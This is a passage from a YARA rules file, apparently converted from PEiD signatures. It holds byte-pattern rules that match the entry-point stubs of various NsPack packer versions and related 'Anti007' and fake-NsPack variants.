?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V34_V35_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? ?? ?? 80 38 01 0F 84 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NSPack_Nort_Star_Software_urlwwwnsdsncom: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 F9 00 74 28 43 8D B5 ?? ?? FF FF 8B 16 56 51 53 52 56 FF 33 FF 73 04 8B 43 08 03 C2 50 FF 95 ?? ?? FF FF 5A 5B 59 5E 83 C3 0C E2 E1 61 9D E9 ?? ?? ?? FF 8B B5 ?? ?? FF FF 0B F6 0F 84 97 00 00 00 8B 95 ?? ?? FF FF 03 F2 83 3E 00 75 0E 83 7E 04 00 75 08 83 7E 08 00 75 02 EB 7A 8B 5E 08 03 DA 53 52 56 8D BD ?? ?? FF FF 03 7E 04 83 C6 0C 57 }\r\n        $b = { 83 F9 00 74 28 43 8D B5 ?? ?? FF FF 8B 16 56 51 53 52 56 FF 33 FF 73 04 8B 43 08 03 C2 50 FF 95 ?? ?? FF FF 5A 5B 59 5E 83 C3 0C E2 E1 61 9D E9 ?? ?? ?? FF 8B B5 ?? ?? FF FF 0B F6 0F 84 97 00 00 00 8B 95 ?? ?? FF FF 03 F2 83 3E 00 75 0E 83 7E 04 00 75 08 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPacK_Net_LiuXingPing_Sign_by_fly: PEiD\r\n{\r\n    strings:\r\n        $a = { 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 BB 01 47 65 74 53 79 73 74 65 6D 49 6E 66 6F 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 5E 00 5F 43 6F 72 ?? ?? ?? 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSPack_2x3x_NET_North_StarLiu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { FF 25 A4 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { FF 25 A4 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPacK_V34_V35_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? ?? ?? 80 38 01 0F 84 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v37_North_Star_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 8D ?? ?? ?? FF 80 39 01 0F 84 42 02 00 00 C6 01 01 8B C5 2B 85 ?? ?? ?? FF 89 85 ?? ?? ?? FF 01 85 ?? ?? ?? FF 8D B5 ?? ?? ?? FF 01 06 55 56 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? ?? FF 85 C0 0F 84 69 03 00 00 89 85 ?? ?? ?? FF E8 00 00 00 00 5B B9 67 03 00 00 03 D9 50 53 E8 B0 02 00 00 5E 5D 8B 36 8B FD 03 BD ?? ?? ?? FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 34 01 13 8B 33 03 7B 04 57 51 53 FF B5 ?? ?? ?? FF FF B5 ?? ?? ?? FF 8B D6 8B CF 8B 85 ?? ?? ?? FF 05 AA 05 00 00 FF D0 5B 59 5F 83 F9 00 74 05 83 C3 08 EB C7 68 00 80 00 00 6A 00 FF B5 ?? ?? ?? FF FF 95 ?? ?? ?? FF 8D B5 ?? ?? ?? FF 8B 4E 08 8D 56 10 8B 36 8B FE 83 F9 00 74 3F 8A 07 47 2C E8 3C 01 77 F7 8B 07 80 7A 01 00 74 14 8A 1A 38 1F 75 E9 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 EB 0A 8A 5F 04 86 C4 C1 C0 10 86 C4 2B C7 03 C6 89 07 83 C7 05 80 EB E8 8B C3 E2 C6 E8 3A 01 00 00 8D 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_29_North_Star_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V11_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 57 84 40 00 2D 50 84 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V23_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 70 61 63 6B 24 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V30_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? E9 ?? ?? E8 ?? ?? 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V23_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 70 61 63 6B 24 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v31_North_Star_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 68 00 80 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V13_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V37_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 80 39 01 0F ?? ?? ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V25_V26_NsPacK_Private_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 53 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_14_by_North_Star_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NSPack_3x_Liu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_31_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V31_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V11_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 57 84 40 00 2D 50 84 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V10_V2X_NsPacK_Private_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 45 78 69 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V31_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V2X_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 6E 73 70 61 63 6B 24 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V10_V2X_NsPacK_Private: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 45 78 69 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V2x_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 }\r\n        $b = { 6E 73 70 61 63 6B 24 40 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_v032a_fake_nSPack_13_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D3 FE FF FF 8B 06 83 F8 00 74 11 8D B5 DF FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V2x_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_nSPack_13_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 A6 00 00 00 B0 7B 40 00 78 60 40 00 7C 60 40 00 00 00 00 00 B0 3F 00 00 12 62 40 00 4E 65 6F 4C 69 74 65 20 45 78 65 63 75 74 61 62 6C 65 20 46 69 6C 65 20 43 6F 6D 70 72 65 73 73 6F 72 0D 0A 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 2C 31 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V13_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_31_by_North_Star_Liu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V11_LiuXingPing_: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 57 84 40 00 2D 50 84 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V27_V35_NsPacK_Private: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 54 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v23_North_Star_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 56 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 54 03 00 00 03 D9 50 53 E8 9D 02 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V37_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 80 39 01 0F ?? ?? ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v23_North_Star: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD }\r\n        $b = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 56 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 54 03 00 00 03 D9 50 53 E8 9D 02 00 00 61 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPack_v23_North_Star_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 56 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 54 03 00 00 03 D9 50 53 E8 9D 02 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSPack_2x_North_StarLiu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { FF FF 8B 4E 08 8D 56 10 8B 36 8B FE 83 F9 00 74 3F 8A 07 47 2C E8 3C 01 77 F7 8B 07 80 7A 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NSPack_3x_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF ?? 38 01 0F 84 ?? 02 00 00 ?? 00 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NSPack_Nort_Star_Software_httpwwwnsdsncom: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 F9 00 74 28 43 8D B5 ?? ?? FF FF 8B 16 56 51 53 52 56 FF 33 FF 73 04 8B 43 08 03 C2 50 FF 95 ?? ?? FF FF 5A 5B 59 5E 83 C3 0C E2 E1 61 9D E9 ?? ?? ?? FF 8B B5 ?? ?? FF FF 0B F6 0F 84 97 00 00 00 8B 95 ?? ?? FF FF 03 F2 83 3E 00 75 0E 83 7E 04 00 75 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V2X_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 6E 73 70 61 63 6B 24 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_3x_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_31_North_Star_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_14_Liuxingping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 ?? ?? 40 00 2D ?? ?? 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_14_by_North_Star_Liu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V30_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? ?? ?? 66 8B 06 66 83 F8 00 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V14_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B1 85 40 00 2D AA 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NSPack_Nort_Star_Software_urlwwwnsdsncom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 F9 00 74 28 43 8D B5 ?? ?? FF FF 8B 16 56 51 53 52 56 FF 33 FF 73 04 8B 43 08 03 C2 50 FF 95 ?? ?? FF FF 5A 5B 59 5E 83 C3 0C E2 E1 61 9D E9 ?? ?? ?? FF 8B B5 ?? ?? FF FF 0B F6 0F 84 97 00 00 00 8B 95 ?? ?? FF FF 03 F2 83 3E 00 75 0E 83 7E 04 00 75 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V29_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? ?? ?? 8A 06 3C 00 74 12 8B F5 8D B5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_23_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_30_by_North_Star_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 55 F9 FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 7D F9 FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 11 F9 FF FF 89 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V14_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B1 85 40 00 2D AA 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V13_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSPack_2x3x_NET_North_StarLiu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { FF 25 A4 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v31_North_Star_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 68 00 80 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V33_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? ?? ?? 80 38 00 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSPack_2x_North_StarLiu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { FF FF 8B 4E 08 8D 56 10 8B 36 8B FE 83 F9 00 74 3F 8A 07 47 2C E8 3C 01 77 F7 8B 07 80 7A 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSPack_1x2x_North_StarLiu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_NsPacK_Private: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 10 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V11_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 57 84 40 00 2D 50 84 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v31_North_Star_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_Net_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 BB 01 47 65 74 53 79 73 74 65 6D 49 6E 66 6F 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 5E 00 5F 43 6F 72 ?? ?? ?? 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_30_North_Star: PEiD\r\n{\r\n   